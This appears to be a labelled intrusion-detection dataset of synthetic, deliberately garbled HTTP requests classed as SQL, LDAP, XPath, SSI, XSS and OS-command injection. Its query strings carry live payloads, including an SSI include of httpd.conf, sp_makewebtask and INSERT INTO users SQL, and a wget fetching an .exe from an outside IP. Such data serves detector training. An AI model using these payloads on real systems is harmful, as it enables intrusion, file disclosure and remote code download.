GET /wp-BaK1IzQk/kkq/kSbsctiiNp/neUtEhmj8tm/mvClzJhlaww/ooaae8rk8/aBaNrL1@/tG0MTh@Dxb0XYHV/i0reetekatre/iyfkrknm7/tedEasin6f7engbp.js?6bDA=27480&y9Eadbbtmh=%3C%21--+++%23include+++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22--%3E&jhttetbiihibesm=5822545 HTTP/1.1
Host: www.eintt.cz:36668
Connection: close
Accept: image/*;q=0.3, text/html
Accept-Charset: iso-8859-5;q=0.4, utf-7;q=0.2
Accept-Encoding: gzip;q=0.1, deflate, gzip;q=0.3, gzip;q=0.3, identity
Accept-Language: *
Cache-Control: max-age=00499
Client-ip: 9.173.197.156
Cookie: bXFaXboot.inizC.a=ni3
Cookie2: $Version="9"
Date: Wed, 24 Jun 09 08:30:18 UTC
ETag: W/"Ne7FULYkvbu.-BWNg_8"
Expect: ailel=ewuid;sddttdad
If-Unmodified-Since: Fri, 27 Mar 09 15:51:33 GMT
If-Match: *
If-None-Match: "02z_Tt5wnpQ4NDNmjBID"
Max-Forwards: 6
MIME-Version: 6.0
Pragma: no-cache
Authorization: Basic M3p1czBmZTpjaW5lYXJkcw==
Range: 153-666
Referer: /reHsfer/psLl/lorEiena.asp
Trailer: Via
User-Agent: Mozilla/9.0 (compatible; MSIE 7.1; Unix; trshce0i; mmRnbtshaa)
UA-Pixels: 181x202
Transfer-Encoding: deflate
Upgrade: Krsn/5.1, q45i98/5.6, ssP5u/2.3, saswai/9.9
X-Serial-Number: 39977076241136
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39784
Start - Id: 37034
class: LdapInjection
GET /trtnin7rlioyl0/ad.3oAoAw/pQ/3NyU/QlNfWB-qtOoPV.msf?cye=rbll%27852u%3DtUme&gToUWzaa7s2iidt=ahh0&E4YSas1ss2=%29+++%28+++%7C++%28displayName%3Dhad*%29+++%28name%3D++++had*+%29%28++++mail%3Dhad*%29&T5x8lFP=ehe%7Chf2oh&elecky7sl=t%2Bhtaccessopeniinu%2Faunion2n1&tcdTi7betif=swZKemU9h0&ic5=%25hiob3or+1i%25g%25u2e&blfubzt3seeaye=%253eS&L5toG=p5ecoiot&ysE=%7Copeno&r0rn2desdltcsc=448&6BrT=75522 HTTP/1.1
Host: www.afo2iglw.de
Connection: close
Accept: application/*;q=0.8, audio/basic, image/*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: yRq='lt'
Client-ip: 228.88.111.225
Cookie: s5eghbd1=i;lmte=eN st0Ni[r?nNv;mnOhx.I4=88679
Cookie2: $Version="95"
Date: Tue, 27 Feb 07 18:18:11 GMT
ETag: ".SThcMpKfONI8Cjdcf"
Expect: kodtt
From: lkiihrt@HleY.cz
If-Modified-Since: Sat, 16 Dec 06 18:54:11 GMT
If-Unmodified-Since: Mon, 26 Feb 07 07:31:34 GMT
If-Match: *
If-None-Match: *
If-Range: "iy2.9BK1JPsvN9p"
Max-Forwards: 07
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: 7leiRa otmjthT=taes
Range: 13730-521,976-,-1177
Referer: http://www.4totreN.ch/pugjsc/osde/eafheo/en5ai7/Ewdtenf.tar.gz
TE: trailers,trailers
Trailer: Connection
User-Agent: Mozilla/9.8 (Machintosh; U; PPC 6.8; e7-ba; rv:5.9.9) Gecko/38828685
UA-CPU: MIPS
UA-Disp: 2495,217,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9902x0663
Via: HTTP/7.1 www.itoyhei.shtml
Transfer-Encoding: h4e2Oh; zotoikeu=rAgrxl
Upgrade: nopuat/4.5
Warning: 561 255.42.223.99:0 "naeetom" "Sat, 31 Jul 04 14:02:35 GMT"
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37034
Start - Id: 49506
class: XPathInjection
GET /8fd/e8ttyiiaHnr7tscdh6aa/tq4B./2dgbv/uLuPNQo-6x4/.PS-H85T9I/3JmCCZyalT@KfRQ/eYerrnxrsirpseih/8iysHxbeeihfLt0imie/ftncmbnaTsmeC2j/mUbPae1Fze@D44gnmsBO/eedhnehevvEhitm.js?skeuanmtE=yiju%27++++or+utl%2Funpwoc%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D8%5D+++or+++++%27itekr%27+++%3D+++%27&7al=fk&8ujP=0240680385&u4q5oCpyeo=243692&inu=sWb8jZ2-&dh=yxpJ73Eufopassthruux&mawoitaigIesu=m28df_vV&znwllseusteiEu=eatSflc9si&lLGconnectZPF.p2=n7nA&o9PMsAAMH0=%3DgH7eobst&lstii=ri&hm=%27ad%2Fb&arheueptdnofer=dhr9&8jtr=ra HTTP/1.0
Host: www.ipcsau.com
Connection: close
Accept: video/*, video/quicktime
Accept-Charset: iso-8859-4;q=0.5, x-mac-hebrew, iso-8859-8-i;q=0.2
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.3
Cache-Control: max-age=7
Client-ip: 95.13.200.201
Cookie: rRHpBtmpzid0P=gm7ea
Cookie2: $Version="61"
Date: Sun, 13 Apr 08 23:54:53 CET
ETag: W/"r2AbaBUZcYbH-sHcVU8"
Expect: 100-continue
From: egyritN@etesgoUsht.it
If-Modified-Since: Mon, 30 Nov 09 06:24:18 GMT
If-Unmodified-Since: Sun, 13 Dec 09 20:57:57 UTC
If-Match: "GKeXE8uhsI9QuLqeb3-a"
If-None-Match: *
If-Range: "-9BPWH.4WlUwV-5q-HX2"
Max-Forwards: 8
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: ao6tbr qsmelsdm=S7mcd8of
Authorization: ieer sfiotoe=ytcS
Range: 2-801463,7709-,5-5829
Referer: /oAc3/istpdog/nnhc6ohl/nzteej.jpeg
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/1.3 (X11; U; Unix 9.1; fw-iS; rv:0.7.0) Gecko/01637520
UA-CPU: StrongARM
UA-Disp: 4263,349,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4726x3292
Via: 5.4 www.nhzio0eo.gif, 2.6 www.wfwftt.jpeg, i9i/1.1 www.toeOtt.js
Transfer-Encoding: dhce; idx1biho=ietT5Dtt
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 646 www.qqkiis.css "nsutrl9tXaNtumo" 
X-Forwarded-For: 113.38.28.52
X-Serial-Number: 201583507
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49506
Start - Id: 39559
class: SSI
PUT /dyHj/hP6-xt60Xq/tiGO.0l..Jn2oJ@/pmyasgasu/egEaa9hfi/ploEcxTmlosezeaor/WKI3lxc7zNKJ/l22HRGWU.pl? HTTP/1.1
Content-Length: 75
Content-Language: enloekl,a,Aietw
Content-Encoding: identity
Content-Location: /ato7yr/anmd/spegpmia/gsstsoel/rah6rn.php3
Content-MD5: bnIxbmxpdEhPZWxodHJzbA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 29 Jun 09 03:19:35 GMT
Last-Modified: Thu, 13 May 04 02:42:58 CET
Host: 168.117.204.33:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.8
Accept-Encoding: compress;q=0.7, compress, gzip;q=0.8, compress;q=0.3, gzip
Accept-Language: *;q=0.5
Cache-Control: min-fresh=98
Client-ip: 147.32.196.230
Cookie: diaiicCooboa=1HlT9P;ld=sN.;outr7rAa=9NstrLnn;ftt8ietaitOn=60;Ooos8=7Btmntreao;ec=CiEgerwithi
Cookie2: $Version="99"
Date: Mon, 05 Nov 07 15:34:57 CET
ETag: ".ZpMfbiUz3x2gzQ"
Expect: nmfso8Ea
From: zdt1Ooe@cVtsgan.ch
If-Modified-Since: Tue, 01 Jul 08 03:03:35 GMT
If-Unmodified-Since: Sun, 06 Sep 09 14:46:39 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 27 Jan 08 09:59:13 GMT
Max-Forwards: 737
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: NTLM ZjJzNWlueDhhY29hdHBvZ2VvZWZwcmlyb2ljdDdidm55YXR5eTJpRWV4YWpTZXA=
Authorization: NTLM THR0d2RlZWlscW5yYXRodDF0MGRpd3hhaXN0ZmhzUHN0ZGo1b3dhaG5hc2k=
Range: 80266-6,060-21789
Referer: /ys9ean8i/triC/ecc3chNa/qadbai/Psws5a.css
TE: trailers,gzip;q=0.3,deflate;q=0.5
Trailer: Referer
User-Agent: Mozilla/0.6 (X11; U; Open BSD i586 9.2; tm-ah; rv:8.2.5) Gecko/10376325
UA-Disp: 9090,6972,8
UA-OS: Windows 95
UA-Color: color8
Via: 9.2 101.249.175.32, 0.8 www.ruOivEa.css
Transfer-Encoding: gzip
Upgrade: ibhi3u/4.0, tAAin/1.9, ofae/4.1, dojnr/5.2
Warning: 138 www.mUgeeihd.jpeg "rr0mHnay7tiSwEpan" "Thu, 22 Mar 07 10:16:04 GMT"
X-Serial-Number: 11507528452920010282
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

jen=<!-- #include    virtual="/etc/httpd/httpd.conf"-->

End - Id: 39559
Start - Id: 47414
class: XSS
GET /tzLC-1iHzzpcFnARV8q.jsp?e6d=f%3Bma1Elrqattw5&kQEXWVgGps=NRsw&MIpyznAqd0=sopewr%3Cselectwstdinhti%5Co+upa&oITesuz0euiz=%3Cimg%2Bsrc%3Djavascript%3A+alert++++%28%27fi.aje%27%29++%3E&tsgyeeo=354071088&aRw6xin=aBestbrtmkaiRgi-0di&gtdctt=8655959855&-iHFpawZjtc=oc1qGmB4-3&hsrCorhd=geOfV4oF HTTP/1.1
Host: 119.54.114.202
Connection: imQAmee
Accept: application/*, video/*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: ut-rWcbehek, henidtnt-hehthEf
Cache-Control: no-transform
Client-ip: 2.240.124.1
Cookie: iEri=mp7iMiaran1e
Cookie2: $Version="9"
Date: Sun, 24 Sep 06 01:03:21 GMT
ETag: W/"QWUjZ4EE_zuMajbKCL"
Expect: 100-continue
From: Tfteutit@rtorijsiis.be
If-Modified-Since: Fri, 19 May 06 14:05:41 CET
If-Unmodified-Since: Sun, 02 Apr 06 24:47:01 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3061
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: nuoe nldti=eta2nt
Authorization: NTLM VDdTY2VlZWJvbm5zaXlvcjdudHNjZnFOa2RzYWNsQUVhaGFpZTly
Range: 25658-9605
Referer: /qoatN/ntx2Oie/szEkcOs/Otd8tFI.swf
TE: chunked,deflate
Trailer: If-Range
User-Agent: Mozilla/0.1 (Windows; U; Windows NT 0.9; go-9o; rv:3.8.0) Gecko/41249802
UA-CPU: StrongARM
UA-Disp: 488,2720,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1670x058
Via: 2.5 12.225.82.222
Transfer-Encoding: deflate
Upgrade: s8ps/3.5, oy10/6.8
Warning: 029 www.8bsannTr.png "tiuS0ahxectarQgg" "Sat, 24 Jan 04 03:40:28 GMT"
X-Forwarded-For: 14.95.154.93
X-Serial-Number: 42081713059681814203
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47414
Start - Id: 43279
class: OsCommanding
GET /62JJ6g5sselect0aU/dCCHo/hNzI4vDG/rizsnkm/spr5Ons9EtKiV7/bitqoOMtu/9RQ8I@vechoKQA/gQ_m/_FgYEK7-VTL_/sooei.mdb?d3=+hjrjrzoEpoE&WnNhosbnaa=nE%24ru&taslaaihsmxrti=nrnsz6metowe4uodte&koiteg=Lvnpty&reapiglreb2a=%5Cnwget+++http%3A%2F%2F254.33.171.65%3A87%2Fnftp.exe&olssa7gnrae=qcenbgeeu HTTP/1.1
Host: www.o9hi9d.com
Connection: rlsi
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.0
Accept-Language: eot-nto2s0, 8migI9an-zSAch;q=0.6, xk-rnLylua, onicr2-22epna
Cache-Control: only-if-cached
Client-ip: 86.210.157.25
Cookie: etrC=932359268;xroed=429;ge1o=7eo?likefNshtpassoe g
Cookie2: $Version="414"
Date: Sat, 24 Dec 05 05:46:01 CET
ETag: W/"LVrwdZMaY22OzDr"
Expect: b1t3F5ik=ccEnhleR;tysne=masht6
From: fztees@dntsngao.be
If-Modified-Since: Sun, 15 Jun 08 02:35:55 UTC
If-Unmodified-Since: Sat, 27 Jun 09 08:50:03 GMT
If-Match: "LlYqESggmMdvozlOuT"
If-None-Match: *
If-Range: Mon, 20 Sep 04 03:49:49 GMT
Max-Forwards: 8
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: mVat alaCi5eC=cfwd
Range: -8678
Referer: /xcft/Feesssn/hsrqpt/tAnaa/llnQsso.pl
TE: gzip;q=0.7
Trailer: Accept-Charset
User-Agent: amtBl9 (duciUb; sMnK4M91P6; xWphop0Di; mhkB5KVk-; kE4XDN)
UA-CPU: PowerPC
UA-Disp: 5548,243,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: 1.9 25.119.100.138, 7.5 www.iseerez7.css, 0.4 www.seeiiiOs.html
Transfer-Encoding: deflate
Upgrade: siree/9.1, 17aa/1.9
Warning: 824 77.211.235.51 "cihtsshy" "Wed, 01 Mar 06 07:42:35 UTC"
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 9975739043069
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43279
Start - Id: 42402
class: SqlInjection
GET /6E3/mxWGD._dvI./bLbTT@u/ooc/giteo/nioyoacAEeti6ibnevg/ma3hrarRrne/5oic5jezoniE/eV-M_93LMKAy2vj.swf?qInm0sit2isq=5&5o8.EbkM=15&tsc=49&mOjXbU-N=onxis&h9sntDtsE=Eoyah&noNom=-xwp-h&s35aheim05=%3B+++EXEC%28%27INS%27%2B%27ERT++INTO+++users+++++values%2837819%2C%27Sla1i3iEIs%27%2C%27Eeeiznd%27++%29%29&sr6lteeio=a%26d&imdePr=97389&xo5Tupnosytuap=dlnwvNe9gM&@2Xgk8D4_=M6t62EujUt0e&nIemqI=nxhp HTTP/1.0
Host: www.q4mciiq.ch
Connection: txTwfu5
Accept: video/mpeg, text/plain, text/*
Accept-Charset: ks_c_5601-1987;q=0.9
Accept-Encoding: 
Accept-Language: oN-isrhsle, cu-sfse3
Cache-Control: max-age=29390
Client-ip: 175.53.83.245
Cookie: G1eechoSTGN=qinserth06otereohincludeel;oresata1coa5s=29;LswBfopen=ecnNeewalhteei6;u6=250653;Fii=528904
Cookie2: $Version="12"
Date: Sun, 19 Mar 06 02:10:49 GMT
ETag: "Ih__Fx4k.oUhLqaWav7"
Expect: uh9ytmc=WjTg7t
From: aespw@dgaxhlomnn.it
If-Modified-Since: Sun, 18 Mar 07 10:37:17 GMT
If-Unmodified-Since: Sat, 15 Aug 09 06:47:05 GMT
If-Match: *
If-None-Match: "s8MqG@JQ9iKzuWDb4I2"
If-Range: *
Max-Forwards: 2
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: JslOti auhh=xthke
Authorization: Digest nc=fdBBaf51
Range: -4,92807-997,-01613
Referer: http://ljoweyrw.gov/rhrfnpl/yhahuSn/at6oA0.pdf
TE: chunked;q=0.7
Trailer: Host
User-Agent: aetesagda/8.3.2.2
UA-CPU: StrongARM
UA-Disp: 156,101,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 189x646
Via: 0.4 www.wnylltk.htm
Transfer-Encoding: compress
Upgrade: Cuscnt/3.0
Warning: 630 www.qHomhe.tiff "xvqr" 
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 67876
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 42402
Start - Id: 41775
class: SqlInjection
GET /hBd9zlyGua7Lwa0n/zNZr.P.jpg?7t6Despan=ac4V3&oM5reioDZ=s-K.zq&ornuenCe9=lboot.ininhtt&meee0Tnnn3aw=%27++OR+++++%27%27++%3D++++%27&uugir=waAMyh%2B8reay&nau1=%3Frnh&DJ5gaeaemnsil=i34nT8Iyp&lmeyOaa48neem7e=956956&rTbhrnea=09 HTTP/1.0
Host: 247.196.186.92
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesetrad, iso-8859-9, iso-8859-4, koi8-r;q=0.7, euc-cn
Accept-Encoding: *
Accept-Language: at-eijTim, 8maa-jX
Cache-Control: max-stale=84380
Client-ip: 19.38.3.115
Cookie: bfb7skgae3=selectEuD
Cookie2: $Version="958"
Date: Mon, 20 Oct 08 16:00:33 UTC
ETag: "Sd60XM.NsDcpTEMyeIVx"
Expect: osevnd
From: edbsae7@m3iuOei.biz
If-Modified-Since: Thu, 09 Jun 05 06:21:36 UTC
If-Unmodified-Since: Thu, 14 Jul 05 14:53:11 GMT
If-Match: "YL2indNsAFOrdRq-La"
If-None-Match: "LRau5c1.zz3-yDhGd15"
If-Range: *
Max-Forwards: 860
MIME-Version: 3.1
Pragma: 4flri3=s
Proxy-Authorization: Digest cnonce="ayrepssY"
Authorization: Digest uri=http://www.oatedeu.it/lhcqn/Azdf/riKs/t4m9mja/r5dp.tiff
Range: 4745-5836
Referer: /eIi4/EhGttga/ejre6nr/A9l2e/moi7z.zip
TE: trailers,trailers
Trailer: Upgrade
User-Agent: yGcTxBe http://www.l5TzEy.de
UA-CPU: x86
UA-Disp: 079,3300,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 5624x146
Via: HTTP/5.4 www.eXara.jpg, suc/1.2 www.ehed3r.js:55
Transfer-Encoding: deflate
Upgrade: ndao/2.1, s0t/9.9, sturte/9.3, ttin7e/5.5
Warning: 049 www.aefei.js:6 "teqln" "Mon, 08 Feb 10 13:37:48 GMT"
X-Forwarded-For: 126.254.87.29
X-Serial-Number: 79451842006720281
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41775
Start - Id: 43476
class: OsCommanding
GET /rjQ64bTQCFeI94/lsagezdxierE/oMjzbtESgW8vgikrFBE/nofucic/QPselect.AVVwkevalZm/qRm_hhmXyc.css?slhns=42658890&7dXmKGP=texpt+sm&mpEeth=9203&F1lo=%5Cn++++uftp+++-p+++www.maitleat.com+++++%2Fasisge%2Fetll%2Fndndit%2Framero%2Freli%2Frait HTTP/1.1
Host: www.baumc.it:80
Connection: keep-alive
Accept: text/html;q=0.3, image/jpeg;q=0.7
Accept-Charset: x-mac-cyrillic;q=0.7, iso-8859-8, iso-8859-4;q=0.8, cp-936, iso-8859-3
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=60176
Client-ip: 166.169.65.71
Cookie: nymxrq0simr5a9s=yNp;gbpEod=956649;mFra8eDinboe40o=osi;nrgom8s=11810;ahn06ene=hnny
Cookie2: $Version="2"
Date: Sat, 03 May 08 02:12:39 UTC
ETag: W/"Gc17qNc-QoIwJfgPlGp"
Expect: Nlrhate=Eej0hh;etio=etesUr0
From: t3bs@fsiaebtorf.it
If-Modified-Since: Sat, 16 Feb 08 15:27:13 GMT
If-Unmodified-Since: Sat, 23 Sep 06 24:02:41 UTC
If-Match: *
If-None-Match: "iEbCkaeVHu-qF9Sb0L5."
If-Range: Tue, 02 Nov 04 09:59:58 UTC
Max-Forwards: 2786
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Digest username="ncuenm"
Authorization: 3Ussq yvmt=sasm
Referer: http://rrod.de/ecrosh.tiff
TE: trailers
Trailer: Range
User-Agent: tecuhnJqa5uaetjhi8
UA-CPU: Sparc
UA-Disp: 663,6446,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 333x8954
Via: FTP/8.7 www.7yerro.gif, FTP/4.5 www.9tsb.tiff
Transfer-Encoding: deflate
Upgrade: lrtrnn/3.5
Warning: 847 www.0te1.css "ctnpcrbrylblaepn" "Wed, 02 Aug 06 09:38:06 UTC"
----: -----------------------------

null

End - Id: 43476
Start - Id: 38594
class: LdapInjection
GET /.YSldzRhomevXy-Zvz.pl?netcatVtxV=sL%40_A4&smesfhstcaiEh=%29++%28%7C+%28+cn%3D*o++%27brien*++%29%28mail+%3D*o++%27brien*++%29+++&puuAtei=sl HTTP/1.0
Host: www.KXrhnsnst.net:80
Connection: keep-alive
Accept: audio/*, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 165.158.133.130
Cookie: rtu4sdeelqsrirn=ttac;nppavobhedIaA3=8552784
Cookie2: $Version="61"
Date: Tue, 27 Jun 06 01:21:53 UTC
ETag: W/"syOB.UeNs9HQB7O"
Expect: 100-continue
From: Henr0sl4@nexht.fr
If-Modified-Since: Thu, 13 Jul 06 13:55:09 UTC
If-Unmodified-Since: Mon, 30 Jan 06 24:53:45 GMT
If-Match: ".1uEdH6Ht1u7UDzk"
If-None-Match: "h1BPi-nTdopDD7D95"
If-Range: *
Max-Forwards: 3210
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="0Nnzylmx"
Authorization: Basic aXN3ZGVoblQ6dEh0cGJzcw==
Range: -348176
Referer: /bsaHe/yist/de3tSn/nr7nd/etne.css
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/3.4 (X11; U; SunOS sun4u 2.9; de-lH; rv:8.4.9) Gecko/64640205
UA-CPU: 68000
UA-Disp: 9162,3647,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2971x6869
Via: 7.6 www.asExau.htm, 5.7 www.ttLeolon.jpg
Transfer-Encoding: identity
Upgrade: o9ttnl/4.2, 5tnn/9.6, rmt/0.6
Warning: 619 187.93.166.222 "etLesebuo9iioii" 
X-Forwarded-For: 248.9.49.144
X-Serial-Number: 379109696738614
----: --------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 38594
Start - Id: 38509
class: LdapInjection
GET /cLRXK8CvScV/nmkho.htm?1qvoYOIxprocessing-instructionEsL=tHmJOy%40%40_UZ&z4E1mdtriasrL=emesseh&R4zM=%2Fo%7E%3A&otxehnelPS=txeemm%24%29h&esed3tl=%29%28+%7C%28etsp%3Dyr*%29&e6E7ny=idoT&caqEiz9Juotj=he8qjtg2n&Ire=r51xmPa&nvwee3incesw=4051&sfsdmopy=atoU&suQ=tOteuc8FasAp7ztistsp&x7aEgel=%5Doi&oto=2197&blAl0ii=dxVGO HTTP/1.0
Host: www.aaee0.it:80
Connection: keep-alive
Accept: image/*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: 88=an5s6
Client-ip: 83.3.20.105
Cookie: engl5sxa=cdnoOtelnetllswindow.openhu
Cookie2: $Version="388"
Date: Thu, 13 Sep 07 22:10:02 GMT
ETag: "qcoSX53foSbz95-5"
Expect: 100-continue
From: ufiseea@gios.org
If-Modified-Since: Mon, 25 Apr 05 02:25:32 UTC
If-Unmodified-Since: Fri, 20 Feb 09 11:23:30 CET
If-Match: "cca5.6ISIkjdZr8kIR"
If-None-Match: *
If-Range: "qN9HSGace9QIzq7r08zz"
Max-Forwards: 087
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest response="Fd6C0B3D3bd244b0cA2F85cC8f1AA3cb"
Authorization: NTLM U2xkYXBicmQ2bmFDbXJzdGxlZXQxNmllck9SNmM0aWRsb2h2eHI0dWV0
Range: -087,245-62681,-648438
Referer: http://www.JwL7fsat.biz/atED/u2keer/1meesasi.cgi
TE: deflate;q=0.4
Trailer: Warning
User-Agent: rccl7G http://www.eoonl.cz
UA-CPU: 68000
UA-Disp: 299,3970,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9397x4761
Via: FTP/1.8 3.6.237.98:7, aur/9.7 177.41.40.136
Transfer-Encoding: identity
Upgrade: liDg/6.9, m3r2/7.5
Warning: 217 201.65.24.14 "trTmQnnra" "Fri, 16 Apr 04 06:13:32 CET"
X-Forwarded-For: 172.88.16.189
X-Serial-Number: 30599
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38509
Start - Id: 36604
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .exe? HTTP/1.1
Host: www.j2uirqoith.it
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: compress, identity, compress, deflate;q=0.4, compress;q=0.4
Accept-Language: catrts5-lhtSti, w-da;q=0.6, t-m;q=0.7, s-Jbeu
Cache-Control: no-store
Client-ip: 34.3.142.249
Cookie: iaBoetld=g:r/t;senbh=60176188;e2nle=hsde6 ] @n@6h0d?m8l
Cookie2: $Version="9"
Date: Mon, 29 Jun 09 13:37:00 CET
ETag: W/"pQOXcIItfLgaCXJGA"
Expect: 100-continue
From: oAud4eo@aM6ymuu.de
If-Modified-Since: Thu, 29 Sep 05 18:53:19 UTC
If-Unmodified-Since: Mon, 08 Feb 10 10:00:09 CET
If-Match: *
If-None-Match: "y3-OKVTeDdF14ozbiQ9"
If-Range: Tue, 04 Apr 06 01:21:17 GMT
Max-Forwards: 61
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Basic RWViaWU6ZWh6c3JkYw==
Authorization: Digest uri=/icoRDn/yo3Wosv/4heSdeq.pl
Range: 6-,-601,-000578
Referer: http://j2obr4o.uk/eEeet/n2pap/rieefa/ea1Esesa/ediErtt.dll
TE: trailers,deflate
Trailer: Max-Forwards
User-Agent: Mozilla/6.3 (X11; U; SunOS sun4u 5.6; Be-di; rv:6.1.0) Gecko/98004740
UA-CPU: MIPS
UA-Disp: 1925,168,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: liepn/8.2 www.teEte.gif, FTP/2.8 64.225.96.34
Transfer-Encoding: identity
Upgrade: uof/2.1, pIto/5.6, Weac/8.2, o0shyf/1.7
Warning: 079 www.hmte9ks.gif "bsnlaehuereei" 
X-Forwarded-For: 2.248.231.30
X-Serial-Number: 0686987
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36604
Start - Id: 41052
class: SqlInjection
GET /twK16nhtaa9n0/rVXzTZQPQeny3JEfwW/nieapai/woeesootedinoaO.nsf?.qFkJU=ase&tm=w&vee=408030&eagry=391&AVbJ@optTpi=os&j53hn34amilkqt=pgm&tiuaTdre0=de%28trt3a&onw8lenoelmaian=inperl&aahrqDtoli=%29e&ncynet8re=131&of3vu2624an=806874&wpZoa1Es5irt=nrrVn&gjuieTanroaot=%27%3B++EXEC+++master.dbo.sp_makewebtask+%27c%3A%5Cinetpub%5Cwwwroot%5Csm.gif%27%2C++++%27SELECT+tnW++++FROM+ti+++WHERE+++xtype%3D%27%27U%27%27%27&sIie4e7nztahaa=iafrug2ruel HTTP/1.1
Host: www.mAlo.st
Connection: close
Accept: video/*;q=0.9, video/*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-age=98
Client-ip: 228.4.149.91
Cookie: Aconnectd9a=2oon;ldsirLsoz=andai
Cookie2: $Version="386"
Date: Sun, 16 Jan 05 21:23:24 UTC
ETag: W/"8ZFZf9yc-djNYPGhy8y"
Expect: anoat
From: 4a4Ax80@ieieio.ch
If-Modified-Since: Fri, 12 Feb 10 19:13:18 CET
If-Unmodified-Since: Fri, 29 Apr 05 18:31:21 UTC
If-Match: "5mqQPy@ILOQhO5Nzde"
If-None-Match: *
If-Range: Sat, 21 Apr 07 21:30:31 CET
Max-Forwards: 90
MIME-Version: 1.5
Pragma: e='wd'
Proxy-Authorization: NTLM c3RhdnNuaU9hMWF0VHRnczFzMTF0N29wZWl4d2NlTG5ubg==
Authorization: 3fmER daqauao=rdppA6t
Range: 7-04,570-
Referer: http://rwow.be/aepu/edf7/ohvscn/raeaase.js
TE: gzip
User-Agent: Mozilla/4.0 (Windows; U; Win 9x 8.9; Ia-ls; rv:7.8.1) Gecko/89643574
UA-CPU: PowerPC
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 967x915
Via: 8.9 www.enenr.jpeg:86
Transfer-Encoding: compress
Upgrade: asen/7.4, uore9m/4.0, Yhen/4.8
Warning: 428 www.ndOerieL.jpeg:9 "btsgnnnhoeooes5ArHa7" 
X-Forwarded-For: 57.95.233.202
X-Serial-Number: 54708069609443708
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41052
Start - Id: 46911
class: XSS
PUT /_@aZKgC/U9DidTRk1ntdS5/8QYo@AC/Eenrslshl20rS/tP7.1mKR4lx@TRHbI/4y.P.OuF/51zsHesihs.aspx? HTTP/1.1
Content-Length: 451
Content-Language: l,ahsth
Content-Encoding: deflate
Content-Location: http://www.njeuosdy.uk/ailn.swf
Content-MD5: a25hZHRzQmZvaUVqc3J0bw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Apr 08 20:20:19 UTC
Last-Modified: Sun, 07 Sep 08 01:09:45 UTC
Host: 194.22.77.160
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 44.189.197.231
Cookie: tah=rnf;msqh=eg4H0KLmR1;U2IJ_R-e-=544;GserdlhhEl1dmv=eRt6CUVrUww;0FdQ31n@J=e1ue%sdN/0dd7nuehttpsn\exec&
